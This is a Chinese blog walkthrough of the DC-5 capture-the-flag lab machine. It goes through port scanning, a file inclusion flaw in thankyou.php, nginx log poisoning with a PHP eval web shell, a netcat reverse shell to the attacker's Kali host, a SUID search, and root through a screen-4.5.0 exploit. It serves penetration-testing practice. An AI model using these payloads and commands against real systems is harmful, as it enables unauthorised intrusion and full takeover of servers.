靶机-DC5

srp-scan查找靶机IP

在这里插入图片描述

masscan扫描端口

在这里插入图片描述

nmap深度扫描

在这里插入图片描述

端口:80,111,37895

dirsearch扫描目录,御剑和dirb没扫到多少

在这里插入图片描述

[19:49:42] 200 -    4KB - /contact.php
[19:49:43] 301 -  184B  - /css  ->  http://192.168.253.135/css/
[19:49:49] 200 -    6KB - /faq.php
[19:49:50] 200 -   17B  - /footer.php
[19:49:54] 301 -  184B  - /images  ->  http://192.168.253.135/images/
[19:49:54] 403 -  570B  - /images/
[19:49:55] 200 -    4KB - /index.php
[19:50:31] 200 -  852B  - /thankyou.php

http://192.168.253.135/contact.php

主页发现提交框

在这里插入图片描述

在这里插入图片描述

发现http://192.168.253.135/footer.php中年份会变

在这里插入图片描述

http://192.168.253.135/thankyou.php也会变,推测包含footer.php

在这里插入图片描述

不难推测参数是上面提交的

在这里插入图片描述

文件包含

/thankyou.php?file=/etc/passwd 发现确实存在漏洞

在这里插入图片描述

写入一句话

前面信息收集发现网站web容器为nginx,nginx的日志文件路径一般为/var/log/nginx/access.log

把访问路径更改为木马文件

/hack  <?php @eval($_REQUEST[cmd]);?>

页面回应404

在这里插入图片描述

访问日志文件查看是否生效

/var/log/nginx/access.log和/var/log/nginx/error.log

查到路径

在这里插入图片描述

蚁剑连接

在这里插入图片描述

反弹shell到kali

nc -e /bin/bash 192.168.253.129 9999

利用python脚本开启交互模式,在kaili上输入命令行

python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述

接下来找找看是否存在root权限无密码的存在,输入命令行

find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述

发现screen-4.5.0,尝试

查找相关漏洞

在这里插入图片描述

复制到当前目录

在这里插入图片描述

通过蚁剑上传靶机tmp目录下

在这里插入图片描述

在tmp下执行sh

在这里插入图片描述

获取root权限,找到flag

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值